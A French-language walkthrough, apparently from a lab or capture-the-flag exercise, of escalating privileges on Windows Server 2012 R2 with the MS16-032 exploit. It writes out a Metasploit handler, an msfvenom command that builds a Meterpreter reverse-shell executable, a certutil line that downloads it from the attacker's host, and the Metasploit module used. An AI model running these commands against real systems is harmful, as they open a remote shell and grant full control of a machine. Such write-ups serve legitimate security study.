Windows Server 2012 (Kernel Exploitation)

Kernel Explotation:

Nous avons recherché des exploits spécifiques à Windows Server 2012 R2 pour l'escalade locale des privilèges. L'exploit MS16-032 s'est avéré être pertinent pour cette version de Windows.

GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合GitHub

MS16-032 pour Windows 2012 R2 (local privilege escalation).

windows-kernel-exploits/MS16-032 at master · SecWiki/windows-kernel-exploitsGitHub

Reverse Shell via Metasploit

Nous avons ensuite créé un fichier .exe pour établir une reverse shell depuis Metasploit. Les étapes suivantes ont été suivies :

Mise en écoute sur Metasploit :

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.12
set LPORT 4444
exploit -j

Création du payload shell.exe avec la commande suivante :

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=4444 -f exe -o shell.exe

Transfert du payload à l'aide d'un serveur HTTP Python et de certutil :

python3 -m http.server

certutil.exe -f -urlcache -split http://10.10.14.12:8000/shell.exe

Une fois le fichier transféré, nous avons réussi à établir une session Meterpreter (session 1).

Exploitation Vulnérabilité MS16-032

Après avoir obtenu l'accès à la machine, nous avons recherché l'exploit vulnérable dans Metasploit :

exploit/windows/local/ms16_032_secondary_logon_handle_privesc

Nous avons configuré les sessions, défini LHOST et LPORT, et choisi la cible Windows x64 pour éviter tout conflit. Après l'exécution de l'exploit, nous avons obtenu un accès complet au système cible.

Mis à jour il y a 1 an

hashtagKernel Explotation:

hashtagReverse Shell via Metasploit

hashtagExploitation Vulnérabilité MS16-032

Kernel Explotation:

Reverse Shell via Metasploit

Exploitation Vulnérabilité MS16-032